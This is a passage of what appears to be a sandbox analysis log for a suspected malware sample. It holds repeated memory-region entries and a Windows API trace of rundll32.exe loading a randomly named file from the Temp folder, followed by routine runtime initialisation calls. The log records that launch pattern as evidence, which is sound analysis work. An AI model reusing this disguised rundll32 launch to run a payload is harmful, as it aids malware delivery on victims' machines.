"pagefile_0x00000000007e0000" filename = "" Region: id = 1095 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1096 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1097 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1098 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1099 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1100 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1101 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1102 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1103 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1104 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1105 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1106 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1107 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1108 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1109 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1110 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1111 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1112 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1113 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1114 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1115 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1116 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1117 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1118 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1119 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1120 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1121 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1122 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1123 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1124 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1125 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1126 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1127 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1128 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1129 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1130 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1131 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1132 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1133 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1134 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1135 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1136 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1137 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1138 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1139 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1140 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1141 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1142 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1143 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1144 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1145 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1146 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1147 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1148 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1149 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1150 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1151 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1152 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1153 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1154 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1155 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1156 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1157 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1158 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1159 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1160 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1161 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1162 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1163 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1164 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1165 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1166 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1167 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1168 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1169 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1170 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1171 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1172 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1173 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1174 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1175 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1176 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1177 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1178 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1179 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1180 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1181 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1182 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1183 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1184 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1185 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1186 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1187 start_va = 0x7e0000 end_va = 0x7edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1206 start_va = 0x7e0000 end_va = 0x803fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Thread: id = 47 os_tid = 0x5bc [0205.075] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0205.075] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75250000 [0205.076] GetProcAddress (hModule=0x75250000, lpProcName="InitializeCriticalSectionEx") returned 0x7530d740 [0205.076] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75250000 [0205.076] GetProcAddress (hModule=0x75250000, lpProcName="FlsAlloc") returned 0x75314490 [0205.076] GetProcAddress (hModule=0x75250000, lpProcName="FlsSetValue") returned 0x7530d7a0 [0205.078] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75250000 [0205.078] GetProcAddress (hModule=0x75250000, lpProcName="InitializeCriticalSectionEx") returned 0x7530d740 [0205.078] GetProcessHeap () returned 0x550000 [0205.078] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75250000 [0205.079] GetProcAddress (hModule=0x75250000, lpProcName="FlsAlloc") returned 0x75314490 [0205.079] GetLastError () returned 0x0 [0205.079] GetProcAddress (hModule=0x75250000, lpProcName="FlsGetValue") returned 0x752ff350 [0205.079] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x364) returned 0x566b88 [0205.079] GetProcAddress (hModule=0x75250000, lpProcName="FlsSetValue") returned 0x7530d7a0 [0205.080] SetLastError (dwErrCode=0x0) [0205.080] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xc00) returned 0x566ef8 [0205.082] GetStartupInfoW (in: lpStartupInfo=0xcf308 | out: lpStartupInfo=0xcf308*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x100337d0, hStdOutput=0xea5cacc7, hStdError=0xfffffffe)) [0205.082] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0205.082] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0205.082] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0205.082] GetCommandLineA () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn " [0205.082] GetCommandLineW () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn " [0205.082] GetLastError () returned 0x0 [0205.082] SetLastError (dwErrCode=0x0) [0205.083] GetLastError () returned 0x0 [0205.083] SetLastError (dwErrCode=0x0) [0205.083] GetACP () returned 0x4e4 [0205.083] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x220) returned 0x567b00 [0205.083] IsValidCodePage (CodePage=0x4e4) returned 1 [0205.083] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcf338 | out: lpCPInfo=0xcf338) returned 1 [0205.083] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcec00 | out: lpCPInfo=0xcec00) returned 1 [0205.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf214, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0205.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf214, cbMultiByte=256, lpWideCharStr=0xce998, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0205.083] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0xcec14 | out: lpCharType=0xcec14) returned 1 [0205.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf214, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0205.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf214, cbMultiByte=256, lpWideCharStr=0xce948, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0205.084] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x75250000 [0205.084] GetProcAddress (hModule=0x75250000, lpProcName="LCMapStringEx") returned 0x752f95f0 [0205.084] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0205.084] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xce738, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0205.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0xcf114, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x07ÅVúPó\x0c", lpUsedDefaultChar=0x0) returned 256 [0205.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf214, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0205.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf214, cbMultiByte=256, lpWideCharStr=0xce968, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0205.084] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 